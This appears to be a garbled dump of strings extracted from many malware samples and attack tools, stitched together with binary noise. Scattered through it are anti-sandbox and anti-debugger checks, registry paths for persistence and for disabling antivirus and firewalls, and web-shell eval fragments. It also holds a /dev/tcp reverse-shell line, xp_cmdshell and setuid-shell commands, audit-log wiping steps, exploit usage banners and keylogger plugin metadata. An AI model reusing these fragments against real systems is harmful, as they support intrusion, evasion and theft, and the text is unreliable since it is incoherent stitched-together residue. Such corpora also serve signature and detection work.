Unavailable taskkill /f /im acro*update.cmdshgetfolderpathj
Unavailable *7a[
Unavailable pola= array(77, 90,33, 84, 104, 105, 115, 32, 112, 114, 111, 103, 114, 97, 109, 32, 99, 97, 110, 110, 111, 116, 32, 98, 101, 32, 114, 117, 110, 32, 105, 110, 32, 68, 79, 83, 32, 109, 111, 100, 101, 46,\\objdata4f4c45324c696e6bd0cf11e0a1b11ae1680074007400700073003a002f002f006600740070003a002f002f00%%eofindex[5 1 7 1 9 4 23 4 50<pdf xmlns=<chunk></pdf>jvberi0<</s/launch/type/action/win<</f<</embeddedfiles
Unavailable +c=pt
Unavailable uuuuuu
Unavailable 8l$8t
Unavailable y2-w
Unavailable \cgz
Unavailable qvy:
Unavailable 0yh4
Unavailable jx{:
Unavailable u49n
Unavailable ven_vmware_prod_vmware_virtual_hgfs.sysmhgfs.sysprleth.sysprlfs.sysprlmouse.sysprlvideo.sysprl_pv32.sysvpc-s3.sysvmsrvc.sysvmx86.sysvmnet.sysvmicheartbeatvmicvssvmicshutdownvmicexchangevmdebugvmmousevmtoolsvmmemctlvmwarevpcbusvpcuhubmsvmmoufxenevtchnxennetxennet6xensvcxenvdbxenvmmvboxhook.dllvboxservicevboxtrayvboxmousevboxguestvboxsfvboxguestadditionsvbox harddisk00-05-6900:05:6900056900-50-5600:50:5600505600-0c-2900:0c:29000c2900-1c-1400:1c:14001c1408-00-2708:00:27080027\\\\.\\physicaldrive0sandbox\\sample\\virusmaltesttequilaboomboommalwareollydbgwindbgframeclassselect description from win32_videocontrollerselect * from win32_videocontrollervirtualbox graphics adaptervmware svga iivm additions s3 trio32/64parallelremotefxcirrus logicmatroxkernel32.dllisdebuggerpresentcontinuedebugeventprocexp.exeprocmon.exeprocessmonitor.exewireshark.exefiddler.exewindbg.exeollydbg.exewinhex.exeprocesshacker.exehiew32.exe\\\\.\\ntice\\\\.\\sice\\\\.\\syser\\\\.\\syserboot\\\\.\\syserdbgmsgsoftware\\microsoft\\windows\\currentversionregqueryvalue55274-640-2673064-2395076487-337-8429955-2261476487-640-1457236-23837sbiedll.dll76487-644-3177037-23510vboxservice.exevmware.exevmware-authd.exevmware-hostd.exevmware-tray.exevmware-vmx.exevmnetdhcp.exevpxclient.exehardware\\description\\systemhardware\\description\\system\\biossystemmanufacturersoftware\\microsoft\\windows\\currentversion\\policies\\explorer\\disallowrunsoftware\\microsoft\\windows\\currentversion\\uninstall\\software\\policies\\microsoft\\windows defenderantivirusdisablenotifydontreportinfectioninformationdisableantispywareruninvalidsignaturesantivirusoverridecheckexesignaturesblackd.exeblackice.exelockdown.exelockdown2000.exetaskkill.exetskill.exesmc.exesniffem.exezapro.exezlclient.exezonealarm.exesoftware\\microsoft\\security centeruacdisablenotifysystem\\currentcontrolset\\services\\sharedaccess\\parameters\\firewallpolicyenablefirewallfirewalldisablenotifynetsh firewall add allowedprogramsoftware\\microsoft\\windows\\currentversion\\policies\\systemdisableregistrytoolsdisableregeditenableexecuteprotectionsupportntsetinformationprocessvirtualproctectexsetprocessdeppolicyzwprotectvirtualmemorydisabletaskmgrvirtualallocexntwritevirtualmemorywriteprocessmemorycreateremotethreadcreatethreadshell32.dllwinexecsoftware\\microsoft\\windows\\currentversion\\runsoftware\\microsoft\\windows\\currentversion\\runoncesoftware\\microsoft\\windows\\currentversion\\runservicessoftware\\microsoft\\windows\\currentversion\\runservicesoncesoftware\\microsoft\\windows nt\\currentversion\\winlogonsoftware\\microsoft\\windows\\currentversion\\policies\\explorer\\runsoftware\\microsoft\\windowsnt\\currentversion\\windowssoftware\\microsoft\\windows\\currentversion\\explorer\\sharedtaskschedulercomfile\\shell\\open\\commandpiffile\\shell\\open\\commandexefile\\shell\\open\\commandtxtfile\\shell\\open\\commandwin.inisystem.inistart menu\\programs\\startupsoftware\\classes\\protocols\\handlersoftware\\classes\\protocols\\filtermicrosoft\\windows\\currentversion\\internet settings\\proxyserversoftware\\microsoft\\windows\\currentversion\\internet settings\\proxyenabledrivers\\etc\\hostsadvapi32.dllcontrolservicequeryservicestatusdllcanunloadnowdllinstalldllregisterserverdllunregisterserverws2_32.dllsystem.netwsock32.dllwsastartupsendtorecvfromwsasendtowsarecvfromudpclientmswsock.dllacceptgetacceptexsockaddrswsaacceptwsasockettcplisteneraccepttcpclient.no-ip.org.publicvm.com.linkpc.net.dynu.com.dynu.net.afraid.org.chickenkiller.com.crabdance.com.ignorelist.com.jumpingcrab.com.moo.com.strangled.com.twillightparadox.com.us.to.strangled.net.info.tm.homenet.org.biz.tm.continent.kz.ax.lt.system-ns.com.adultdns.com.craftx.biz.ddns01.com.dns53.biz.dnsapi.info.dnsd.info.dnsdynamic.com.dnsdynamic.net.dnsget.org.fe100.net.flashserv.net.ftp21.netfirewallapi.dll\\currentcontrolset\\services\\tcpip6\\parameters\\interfaces\\system.net.mailsmtpclientmail from:rcpt to:cdo.messagecdosmtpservercdosendusingmethodcdoex.dll/cdo/configuration/smtpserverpeercollabexportcontactpeercollabgetapplicationregistrationinfopeercollabgetendpointnamepeercollabgeteventdatapeercollabgetinvitationresponsepeercollabgetpresenceinfopeercollabgetsigninoptionspeercollabinvitecontactpeercollabinviteendpointpeercollabparsecontactpeercollabquerycontactdatapeercollabrefreshendpointdatapeercollabregisterapplicationpeercollabregistereventpeercollabsetendpointnamepeercollabsetobjectpeercollabsetpresenceinfopeercollabsignoutpeercollabunregisterapplicationpeercollabupdatecontacttor\\hidden_service\\private_keytor\\hidden_service\\hostnametor\\locktor\\statenickpingjoinuserprivmsgwininet.dllinternetopenurlinternetwritefileidhttpheaderinfourlmon.dllurldownloadtocachefileurlopenstreamurlopenpullstreamftpgetcurrentdirectoryftpgetfileftpputfileftpsetcurrentdirectoryftpopenfileftpgetfilesizeftpdeletefileftpcreatedirectoryftpremovedirectoryftprenamefileftpdownloadftpuploadftpgetdirectorysocketwsaconnectclosesocketwsacleanupdnsapi.dllgethostentrygetaddrinfogethostbynamewsaasyncgethostbynamednsqueryssleay32.dlllibeay32.dlllibssl32.dllidsslopensslcrypt32.dllsystemtimetofiletimegetsystemtimegetsystemtimeasfiletimecryptcreatehashcryptacquirecontextcrypthashdataopencl.dllnvcuda.dllopengl32.dllcpuminer 2.2.2x-mining-extensionscpuminer 2.2.3x-mining-extensionsufasoft bitcoin-miner/0.20stratumsoftware\\microsoft\\systemcertificates\\spc\\certificatescertopensystemstoreadjusttokenprivilegesgdi32.dlluser32.dllbitbltgetdccheckip.dyndns.orgwhatismyip.orgwhatsmyipaddress.comgetmyip.orggetmyip.co.uksoftware\\vitalwerks\\ducj.maxmind.comgetasynckeystategetkeystatemapvirtualkeygetkeyboardtypesamiconnectsamigetprivatedatasamqueryinformationusecredenumerateacredenumeratewsoftware\\microsoft\\internet account managersoftware\\microsoft\\identitycrl\\credssecurity\\policy\\secretswinmm.dllwaveinstartwaveinresetwaveinaddbufferwaveinopenwaveinclosesignons.sqlitesignons3.txtsecmod.dbcert8.dbkey3.dbvncpassviewabe2869f-9b47-4cd9-a358-c22904dba7f7packet.dllnpf.syswpcap.dllwinpcap.dllopenthreadqueueuserapcautorun.infdesktop.inidesktop.lnknetapi32.dllnetsharegetinfonetshareenumultravnc.inistartvncstopvncsystem\\currentcontrolset\\control\\terminal serversoftware\\microsoft\\windows nt\\currentversion\\terminal serversystem\\currentcontrolset\\control\\terminal server\\winstations\\rdp-tcpenableadmintsremotenet start termservicesc config termservice startsoftware\\microsoft\\telnetserveravicap32.dllcapcreatecapturewindowsoftware\\microsoft\\windows nt\\currentversion\\hotfixcreatemutexadvapi32.dllregqueryvalueexaregopenkeyexaregcreatekeyaduplicatetokenexopenprocesstokenlookupprivilegevalueakernel32.dllgetprivateprofileintagetprivateprofilestringawriteprivateprofilestringadeletefileacreatefileafindfirstfileamovefileexafindcloseuser32.dllunhookwindowshookexsetwindowshookexacallnexthookexsoftware\\\\oracle\\\\virtualbox guest additionsvmmouse.sysvmware virtual ide hard drivesystem\\controlset001\\services\\disk\\enumsystem\\\\controlset001\\\\services\\\\disk\\\\enumvmhgfs.sysvmcivmtoolsvmware2vmount2vmusrvcvboxservicevboxtrayxenservice
Unavailable k:@f
Unavailable -p8z
Unavailable 3pme
Unavailable .?avcharnode@@
Unavailable %d0\
Unavailable unlv
Unavailable ckf}
Unavailable gkba
Unavailable 2wk/
Unavailable i"s;
Unavailable lort
Unavailable rquwdg
Unavailable d4lc
Unavailable y,=+
Unavailable [^_a]a^
Unavailable auds
Unavailable *legq
Unavailable x~,0
Unavailable `local static guard'
Unavailable b9sd
Unavailable the3
Unavailable ,8=y:w
Unavailable jw#f
Unavailable !l1q
Unavailable i?*l
Unavailable cbe$t
Unavailable ?8g|
Unavailable bc?>6t9^
Unavailable 1ka'b
Unavailable d$hl
Unavailable tmpa
Unavailable !t-g
Unavailable #x=rj
Unavailable ,=b,
Unavailable t$0f
Unavailable seven_legion@india.comfor decrypt files
Unavailable @a^_^
Unavailable ueeu
Unavailable useragent: auth failedinvalid file path.
Unavailable 6j=le
Unavailable emii
Unavailable : %.
Unavailable <qs=
Unavailable ~z9"
Unavailable (d$pl9t$0t6h
Unavailable k7.d1
Unavailable .iiswebvirtualdirroot[host ] [user ] [pass ] .anonymoususername.anonymoususerpassthe_white_lf_x@hotmail.comautogeneratecolumns=\"false\" onitemcommand=\"filesystem_itemcommand\"<asp:linkbutton id=\"lnkexec\" runat=\"server\" onclick=\"lnkexec_click\">[execute<asp:label id=\"uip\" runat=\"server\" text=\"your ip :\" forecolor=\"#ff8300\"></asp:label>autorun.infravmon.exelasttimekey.inicsdownupdatecsdownversioncsdownloadcsexit
Unavailable n8d>
Unavailable !1n1
Unavailable 5^1@
Unavailable wf[e
Unavailable q/)#w
Unavailable 22gsf
Unavailable mk 6
Unavailable vvvj
Unavailable mose
Unavailable |ad%c
Unavailable 8ck<mu
Unavailable 7o0#
Unavailable rroc
Unavailable &h=b
Unavailable r!0dg
Unavailable hh,c
Unavailable 1+vs
Unavailable l$pe3
Unavailable hincorrect header checkmsaosspc.dllm
Unavailable yk#q
Unavailable o=#z
Unavailable 5'#.a
Unavailable `9-0
Unavailable ;2y,
Unavailable startingatiml.dll
Unavailable 'z(e
Unavailable mhh6
Unavailable h!t$0d
Unavailable d~"~
Unavailable w3svcwmserverssisssrsmsdepsvc\
Unavailable getlasterror
Unavailable 0a_a]a\
Unavailable ; ae
Unavailable .wc00dcj
Unavailable l$8lc
Unavailable /2"mqr
Unavailable :[csb@
Unavailable ?-l#
Unavailable #74wq
Unavailable ^p`h
Unavailable vrpq
Unavailable uz+{
Unavailable ?avcinj2008dlg@@?avcinj2008app@@mp.dll
Unavailable yhdh
Unavailable q\ d
Unavailable 1&"r
Unavailable vbaprojectattribut
Unavailable k"national security agencyisraeli secret intelligencexlxsxlsb
Unavailable ;tr,
Unavailable ) d$
Unavailable #j.6!
Unavailable \x00x86_gmremote.dll\x00\x00d:\\project\\gtproject\\public\\list\\listmanager.cpp\x00\x00gmshutpoint\x00\x00gmrecvpoint\x00\x00gminitpoint\x00\x00gmverpoint\x00\x00gmnumpoint\x00_
Unavailable .>tu
Unavailable aatxn+miwlu+xcomg7sqy1uqxak1qldyoed9lxivqr2z/gsrhisgtvk9ausdfo+9do_pivot(): connections[ix].header.id=%d ix=%dpacket to be bounced too do_pivot: [2] requested %d bytes but got %ddo_pivot(): inconnsistent seq numbers connections[]..seq=%d header.seq=%ddo_pivot(): connections[header.id].header.id=%d header.id=%d!bug, please report!usage:%s ip port [proxip] [port] [key]dw.datsqlpass.dicsql.datfetch.pymethod=postcmdpathencoded_pathdata_%d_%d_%d_%d_%d.txt\"-bfr423mi_6uamtg$bxl\\sd1iu/0ok.cpegbb63-t2p_.rkd0uaeu/x1c$s\\o4ilx\"a-201mt6b3si$ /cebok_i\\m.rdpu4fulgomv3.a 1%tnd\\4ils60n2te_w4mei gd2%rob-8pct1wq_hynlsc0.u9az:\\projects\\rescator\\uploader\\debug\\scheck.pdbs region: found [] bytes of pattern:[cc2 region:cc memregion:kaptoxa=== pid:scan process with pid for kartoxa and string pattern:scan process with pid for kartoxa:scan all processes for string pattern:gotit6i2cn3sep1 uio$ra0su\\wo4b:_kdltw/.nsystem.resources.resourcereader, mscorlib, version=2.0.0.0, culture=neutral, publickeytoken=b77a5c561934e089get_rscget_kyget_rnponeyhorsechocolatemomoquackd
Unavailable 0jq:
Unavailable `|d|
Unavailable u4d9~
Unavailable tpac
Unavailable j'(n5
Unavailable :|b#
Unavailable t$(l
Unavailable uwqs
Unavailable virtualprotectexinvalid parameterwinsta0\\defaultexplorer.execreateprocessasuserahttpendrequestagetmodulebasenameagetmodulefilenameexaenumprocessesspsssqproxy-authorization:basic kpstorecreateinstancefeb 04 2015i can not start %sdwconnectportdwremotelanportstrremotelanaddressstrlocalconnectip\
Unavailable ^a{u
Unavailable \$wd$ml
Unavailable __cxxframehandler
Unavailable !ye(
Unavailable `gy'y#z
Unavailable iphlpapi.dllystem\\currentcorolset\\port.txv1.2 bget a http/1.0e
Unavailable l97t5h
Unavailable ~{+{
Unavailable d$4%
Unavailable 3|o0t
Unavailable ``)5
Unavailable swjjyk
Unavailable ,4rb
Unavailable getprocaddressy`
Unavailable smk2
Unavailable h4_d
Unavailable dgmnoep/%s%s%s/?%s=control panel\\dehttps=https://%snetwork.proxy.ht2http=http://%s:%control panel\\denetwork.proxy.ht&ol1ms9c
Unavailable }ikw
Unavailable oz54
Unavailable generic-type-
Unavailable bv29y
Unavailable ]/`4o
Unavailable |$ ;
Unavailable h4@c
Unavailable ?*u8h
Unavailable @vf;
Unavailable ###assassin######kamikaze###chr(rand(97,122))md5(microtime().rand(0,echo \"###uau-repeatwget -u 'mozilla/5.0 (x11; u; linux i686; pl-pl; rv:1.9.0.2) gecko/20121223 ubuntu/9.25 (jaunty) eval(base64_decode($_request['c_id']))2bd96b5c52d2efd441b75a2617979bdd2b7c84233cd47f142573c18a70ff5770a13756bf1e2bd46921c135232774fc5f36d540721c055de288072d4e16b196dd98f66d46fa71a5fa9b9fcd36aababdae396f72e4974f3e4e2fd7ccffbce9cd7cnot foun derror was encounteredstopcleandositsoknoproblembro
Unavailable mn6a
Unavailable uh_ @
Unavailable b{_u
Unavailable q7a#
Unavailable rl7?
Unavailable #!>:
Unavailable d$a3&3.3<3a3f3k3v3c3m3
Unavailable .&gv
Unavailable rmid
Unavailable 7d<z
Unavailable ozq%
Unavailable ohvyc
Unavailable ]!ut
Unavailable 4$xx
Unavailable 3p=b
Unavailable network.proxy.socks_port\", i am admini am userrun install success!service install success!something error!not configed, exiting$login$$sysinfo$$shell$$filemanager$$filedownload$$fileupload$*
Unavailable imufz
Unavailable k!+,
Unavailable +`?c
Unavailable exitprocess`
Unavailable w,6k
Unavailable )"69
Unavailable p%tg
Unavailable %f-<#
Unavailable |'x~
Unavailable -!bh
Unavailable fd9!u7a
Unavailable eventsetinformation
Unavailable (nkt
Unavailable vv?ogs
Unavailable - orien executable files pro
Unavailable ?untmainfunctions
Unavailable s#h+
Unavailable shellexecutea
Unavailable xmid
Unavailable *.^v>p
Unavailable __clrcall
Unavailable ,<}o
Unavailable get http://%ws:%d/%d%s%dhttp/1.1j:\\chong\\s
Unavailable fubuki.dllcabinet.dll\\uacelevator.pdb%userprofile%\\downloads\\dwmapi.dll%windir%\\system32\\dwmapi.dllinfection module: %scould not save module to %s%s%s%p%s%ld%s%d%sstack area around _alloca memory reserved by this function is corruptedstack around the variable 'm
Unavailable w7h;
Unavailable kernel32.d`
Unavailable 3<3!1
Unavailable 8%;m
Unavailable d$hd;
Unavailable 4"kv
Unavailable sssx-j
Unavailable 2"sc
Unavailable ;=1_
Unavailable <`t'!u
Unavailable p,s7o
Unavailable h@vc
Unavailable d$d$na
Unavailable 7`rc|
Unavailable !hj5
Unavailable phb45
Unavailable qqqqqqqsvw
Unavailable running on this computer!- promiscuous (capture all packets on the network)active filter for the adapter:
Unavailable i[^r"
Unavailable ucl+
Unavailable ^mc+cp
Unavailable e9za
Unavailable &sx}l)
Unavailable 51gg
Unavailable q@zbi
Unavailable yy{8
Unavailable )#n(
Unavailable `managed vector constructor iterator'
Unavailable d$(i
Unavailable nv12
Unavailable 7z\u
Unavailable .textzxur
Unavailable ni,p
Unavailable #ujr'#.
Unavailable :4oh
Unavailable %s; %s=%scookie: %s=%sh
Unavailable dll:%.8xins:%.8x%.2x%.2x%.2x%.2x>=2
Unavailable \x00soul\x00\x00installdll.dll\x00\x00_one.dll\x00_fra.dllcrtruntime.logprod.tproe.tburn\\liveupdata_mem\\
Unavailable @thh
Unavailable f'8v
Unavailable causes: firewall,machine down,dcom disabled\\not supported,etc.7\"7(7/7>7o7]7o7w7@p
Unavailable nan(snan)
Unavailable k2!h
Unavailable mql;yb
Unavailable imc4
Unavailable 1*#q
Unavailable rlaazr
Unavailable @echo off
Unavailable mhnat
Unavailable \$0e
Unavailable f?01wb
Unavailable n>*$
Unavailable ea`l!
Unavailable m_vnc64
Unavailable |rys"
Unavailable suvuwvrqs
Unavailable *~}t
Unavailable 3?ks\i
Unavailable `*ismu
Unavailable vst%d.%d.%d.%sw7%d.%d.%d.%scmdshell closedmput over&binglecreate wpipe failerrcom0\\/*<>|timeout & quit!!!ewr:m:s:h:p:t:b:d:n:w:x:g:k:
Unavailable l<e4
Unavailable projects\\nadzormodulesnadzor\\nadzor_sln[injectpe] svcname=%s[
Unavailable multibytetowidechar
Unavailable ufunctionsu
Unavailable fd9a
Unavailable )|kh
Unavailable \i"3
Unavailable evverclvid.exel2r8ix
Unavailable `x,j
Unavailable iofreemdlkfreleasespinlock<shortdescription>keystroke collector</shortdescription>this plugin is the e_qwerty kernel mode driver for logging keys.</description><commands/></version><associatedimplantid>20121</associatedimplantid><rightsrequired>system or administrator (if administrator, i think the driverins<platforms>windows nt, windows 2000, windows xp (32/64 bit), windows 2003 (32/64<projectpath>plugin/collection</projectpath><dlldepend>none</dlldepend><minortype>0</minortype><pluginname>e_qwertykm</pluginname></comments><comments><majortype>1</majortype><files>none</files><poc>erebus</poc><team>none</team><?xml-stylesheet type=\"text/xsl\" href=\"../xslt/pluginhtml.xsl\"?><pluginsdepend>u_hookmanager v1.0, kernel covert store v1.0</pluginsdepend><plugin id=\"20123\" xmlns:xsi=\"http://www.w3.org/2001/xmlschema-instance\" xsiwarriorpride\\production2.0\\package\\e_wzowski<!-- edited with xmlspy v5 rel. 4 u (http://www.xmlspy.com) by team (renegade) -<configfilename>20123_cmddef.xml</configfilename><name>20123.sys</name><codebase>/bin/i686-pc-win32/debug</codebase>\
Unavailable ~~*"
Unavailable z5~h\
Unavailable tdl+
Unavailable d>(j
Unavailable :$:+:2:9:@:g:n:u:\\:s:6%6+606<6h6m6\\6b6g6v6}68\"8,818;8@8j8o8y8^8h8m8w86 6'6.656<6c6j6q6x6_6f6m6t64\"4)40474>4e4l4s4z4a4h49\"9+91969?9e9j9s9\\9a9j9p9u9~99\"9'91999c9h9r9w9a9f9p9u94\"4(4-4<4b4g4s4_4d4s4y4~46\"6'6,6=6b6g6x6]6b6o6{6?\"?/?4?b?g?l?y?^?k?p?}?3)31383>3c3l3r3w3c3i3n3w3}3;&;+;5;:;d;i;s;x;b;j;t;y;='=,=6=>=h=m=w=\\=a=m=r=w=:!:*:/:9:>:h:p:z:_:i:n:x:}:3$3.383b3l3s3z3a3h3o3v3}3<$<.<3<=<b<l<q<^<c<m<r<|<31383?3f3m3t3[3b3i3p3w3~39!9(9/969=9d9k9r9y9`9g9n9x9:$:*:/:8:>:c:l:u:z:c:i:n:w:|:
Unavailable jrgb
Unavailable >kb|
Unavailable wia3h^
Unavailable rbf;\$,
Unavailable wq<g
Unavailable \\browser.exee
Unavailable wpvq
Unavailable 0fa#
Unavailable messageboxax`
Unavailable this program requires win32this program must be run under win64y_j
Unavailable $:"`
Unavailable 2pnm
Unavailable nf+a
Unavailable eq-g*
Unavailable gvnf
Unavailable yitj
Unavailable l$&@8t$&t0@8q
Unavailable run error!time out,change to mode 0myname--is:busybox iptables -a input -p tcp --destination-port 7547 -j dropbusybox iptables -a input -p tcp --destination-port 5555 -j drop/proc/net/tcp/dev/watchdog/dev/misc/watchdogpmmvfgdcwnvomvjgpzojfkrassl3_ctrl210765qllw;;;;;;get /mirai/dvrhelpertran duy linhdlc corporationdw20.exel
Unavailable 1gpict
Unavailable ltsh
Unavailable d9|$
Unavailable lxy|
Unavailable 9u[>
Unavailable ;lrb
Unavailable qylj
Unavailable 34$cnc
Unavailable t$1h
Unavailable 00dc5
Unavailable rsrc_htmlhwpfilepathcheck.dlladobearm.exeopendocumentexepath: %s\nxlspath: %s\ntmppath: %s\nscvrit001.batxc123465-efff-87cc-37abcdef9[
Unavailable %ag'
Unavailable xo8p
Unavailable =oo<|bq%}~3\
Unavailable m3?=6
Unavailable 6pb:k
Unavailable foc;
Unavailable (>8c
Unavailable a^a\_
Unavailable d19fc0fb14be23bcf35da427951bb5aeurl_loader=%surl_webinjects=%surl_tokenspy=%sfile_webinjects=%smoneyparser.enabled=%uenable_luhn10_post=%uinsidevm_enable=%udisable_antivirus=%ucommand= raw_input(\"enter command: \").strip('n')print '[-] (failed to load moduli -- gex will be unsupported.)'print '[-] listen/bind/accept failed: ' + str(e)chan.send(command)print '[-] ssh negotiation failed.'except paramiko.sshexception, x:&op=%d&id=%s&ui=%s&wv=%d&gr=%s&bv=%s%s @ %supload keylogs
Unavailable hsvw
Unavailable 00dcb
Unavailable |/:zas
Unavailable pklite32 copyright 1
Unavailable getmessagea
Unavailable rl9e
Unavailable 8l0u
Unavailable a:u3ibr&
Unavailable ####@########@####
Unavailable wwpack32
Unavailable lca<a
Unavailable sh8#d
Unavailable @9f>
Unavailable h00dc
Unavailable n.u^9
Unavailable rj)4
Unavailable fb9<bu
Unavailable /f%/
Unavailable w&|.
Unavailable dbnextrow[usage]: %s <hostname|ip> <username> <password>=============by uhhuhy(feb 18,2003) - http://www.cnhonker.net=============cool! connected to sql server on %s successfully!exec master..xp_cmdshell \"%s\"=======================sqlcmd v0.21 for hscan v1.20=======================error,exit!sqlcmd>h
Unavailable le4"
Unavailable dmf_x
Unavailable regopenkeyexw
Unavailable %qjn
Unavailable __unaligned
Unavailable the variable '
Unavailable wuzf"q$'[
Unavailable k\=bl
Unavailable o<nt
Unavailable g(ss
Unavailable #}x=s
Unavailable f;\$@
Unavailable wsprintfa
Unavailable \$hl
Unavailable %)mj
Unavailable 8hay
Unavailable n=t&e
Unavailable w|7o
Unavailable :ij;
Unavailable @}m`
Unavailable t[`b
Unavailable ca,g
Unavailable fh1i
Unavailable +rf(z?
Unavailable +pg)
Unavailable nw(lb
Unavailable 2wxmc&
Unavailable h264
Unavailable `eh vector vbase constructor iterator'
Unavailable dsy!
Unavailable pecompact2
Unavailable k/u
Unavailable bzbk
Unavailable `scalar deleting destructor'
Unavailable <=vn
Unavailable {flat}
Unavailable pqo!4
Unavailable usqwrv
Unavailable 5\';
Unavailable 0.!5z
Unavailable oeynq
Unavailable qko5
Unavailable jzo$l2
Unavailable y]qg
Unavailable :zs>
Unavailable ho:en
Unavailable w-kr
Unavailable t$(d
Unavailable 1uw{
Unavailable kernel3p
Unavailable 5h40l1n
Unavailable |<;r
Unavailable upx!%2d%2d%2d%2d%2d%2dz%4d%2d%2d%2d%2d%2dz/tmp/.javaw
Unavailable jf7=
Unavailable pdvzk6v
Unavailable initcommoncontrols
Unavailable :rsizb
Unavailable 9887___skej3sdhaha123
Unavailable riaaibkr
Unavailable vkvs),`ok
Unavailable t$ d
Unavailable flogon failed. kerberos ticket not yet valid (target and kdc times not synchronized)[-] could not set \"credentialtype\"-xd = dump archive data & store in scancodes.txt-
Unavailable c_l0q
Unavailable dtved
Unavailable d:\\codespace\\powerock\\exp\\afdpre\\bin\\afdpre.pdbguiwang!@#9bd*-a add user(admin$/guiwang!@#9bd*) to admin[err] get haltable addresss fail[err] get zwdeviceiocontrolfile fail[err] get native function pointers fail
Unavailable !f*8
Unavailable 5u0n
Unavailable w.exe
Unavailable shareware - exestealth
Unavailable jpic.gov.sya
Unavailable 3select * from win32_shares
Unavailable dk)l'
Unavailable a7fr.
Unavailable svwuh`p@
Unavailable u+h9
Unavailable t_>on
Unavailable t$ watauavawh
Unavailable february
Unavailable "xz[
Unavailable &wtt
Unavailable 0&_=
Unavailable h4zc
Unavailable rs~<
Unavailable q2y%4
Unavailable _go=
Unavailable x2!5
Unavailable ya*t
Unavailable hori6
Unavailable ~$$n,\
Unavailable _orien executable files protection systemuwvrqs
Unavailable virtualalloc
Unavailable i:p$
Unavailable yr%@
Unavailable kxh;
Unavailable "#{>
Unavailable i>q2
Unavailable d$$p
Unavailable qo)[b
Unavailable hlsc
Unavailable l<0*
Unavailable d$hf
Unavailable =s15~u
Unavailable ay)yv
Unavailable t-a;
Unavailable {lh]
Unavailable 8{?b
Unavailable &}*-qd
Unavailable msger_install.dll
Unavailable pa<a
Unavailable .wzk
Unavailable d$(d
Unavailable |q~z
Unavailable j&{n
Unavailable bpiq
Unavailable ^cse
Unavailable sh,!@
Unavailable rzidi_icon5starter.exewmifw.exesoftware\\rartmp092.tmptemp1.exeviotto keyloggermsvbvm60ftpputfileavba6c:\marijuana.txtsirc4
Unavailable 5z/3
Unavailable t$4h
Unavailable robb[]kp?r
Unavailable k7e{
Unavailable u:jt
Unavailable \\\\%s\\mailslot\\%s%d-%d-%d %d:%d:%d zlsasrv32.dll!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!%s %02x %sviewers5
Unavailable accept-language: zh%d kb/bps|%d%%{!}drz{!}user-agent: uploadorsteamappdata.vdfloginusers.vdfconfig.vdfj
Unavailable tcyi
Unavailable ^=/e
Unavailable 5d{m
Unavailable |qlg
Unavailable fe)s
Unavailable o0nz
Unavailable epe: encryptpe v2.2007.12.1, copyright (c) wfs
Unavailable -/{8
Unavailable unrealizeobject
Unavailable ,gzg
Unavailable ~?x>
Unavailable ;ddreu&
Unavailable [enter][control]modules\\exploits\\littletools\\agent_wrapper\\release... get header fatal error !!! %d bytes read > header_sizei
Unavailable u$hr
Unavailable pv.|
Unavailable deletecriticalsection
Unavailable findclose
Unavailable vnx~
Unavailable \$hi
Unavailable downloadfile - exception:%s,code:0x%08x.mozilla/4.0 (compatible; msie 7.0; windows nt 5.1)cdllapp::initinstance() - evnet already exists../emptycriss <target ip>cut and paste the following to the telnet prompt:environ define ttyprompt abcdefrunning \\\"tcpdump -n -n\\\", on the environment variable \\$interface, scriptedcannot read $opetc/scripme.override -- are you root?$env{exploit_scripme}the encryption key is ___tempfile2.outunless the -c (clobber) option is used, if two retr commands of themywarn(\"end of $destfile determined by \\\"^connection closed by foreign host\\\"\")end of $destfile determined by \"^connection closed by foreign host> /var/log/audit/audit.log; rm -f .pastables to run on target:cp /var/log/audit/audit.log .tmphere is the first good cron session fromno need to clean login lines.sh >/dev/tcp/ <&1 2>&1test: mungedport=%6d pp=%d unmunged=%6decho \"example: ${0} -l 192.168.1.1 -p 22222 -x 9999\"-x [ port to start mini x server on default = 12121 ]\"callback_port=32177usage: %s -e -v -i target ip [-c cert file] [-k key file]type=licxfer&ftp=%s&source=/var/home/ftp/pub&version=na&licfile=[-l log file] [-m save mac time file(s)] [-p server port]chown root sh; chmod 4777 sh;cp /bin/sh .;chown root sh;echo clean up when elevated:exe=$dir/sbin/ey_vrupdatedel --- usage: %s -l file -w wtmp -r userroasting ->%s<- at ->%d:%d<-rbnoil -roasting ->requested forwarding of port %d but user is not root.internal error: we do not read, but chan_read_failed for istate~# - list forwarded connectionspacket_inject_ignore: blockresult = self.send_command(\"ls -al %s\" % self.options.dir)cmd += \"d=-l%s \" % self.options.listen_portuse this on target to get your rat:$ratremotename && $command = \"$nc$bindto -vv -l -p $port < ${ratremotename}\" ;usage: %s -l [ netcat listener ] [ -p optional target port instead of 23 ] <ip>target is not vulnerable. exitingsending final buffer: evil_blocks and shellcode...timeout waiting for daemon to die. exploit probably failed.usage: %s <host> <port> e <contents of a local file to be executed on target>writing your %s to target.(e)xploit, (r)ead, (m)ove and then write, (w)rite-c command: shell command stringcannot combine shell command mode with args to do socket reuse-r: reuse socket for nopen connection (requires -t, -d, -f, -n, no -c)firing with the same hosts, on altername ports (target is on 8080, listener on 443)recieved unknown command payload: 0x%xusage: eslide [options] <-t profile> <-l listenerip> <targetip>-------- delete key - remove a *closed* tabusage: ./exp command display_to_return_tosizeof shellcode = %dexecve failed!echo \"example: ${0} -l 192.168.1.1 -p 22222 -s 22223 -x 9999\"echo \"call back port2 = ${sport}\"* * * * * root chown root %s; chmod 4755 %s; %s[-] kernel not vulnerable[-] failed to spawn shell: %s-s shell use shell instead of %susage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]error: not vulnerableport=%d connected! xxx.xxxxxxexecuting ./ebbnew_linux -r %s -v %s -a %s %s -t %s -p %s./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772version 1 - start with option #18 first, if it fails then try this option%s is a wrapper program for ebbnew_linux exploit for sparc solaris rpc services# building shellcode into exploit.%s -w /index.html -v 3.5 -t 10 -c \"/usr/openwin/bin/xterm -d 555.1.2.2:0&\" -d 10.0.0.1 -p 80# starting exhaustive attack against usage: $prog [-f directory] -p prognum [-v ver] [-t proto] -i ipadr$gotsunos = ($line =~ /program version netid address service owner/ );+ bruteforce mode.+ host is not running samba!+ connecting back to: [%d.%d.%d.%d:45295]+ exploit failed, try -b to bruteforce.usage: %s [-bbccdfprsstv] [host]** significantly improve processing time-c cmd_name: strncmp() search for 1st %d chars of commands that mysql \\$d --host=\\$h --user=\\$u --password=\\\"\\$p\\\" -e \\\"select * from \\$twindow 3: $0 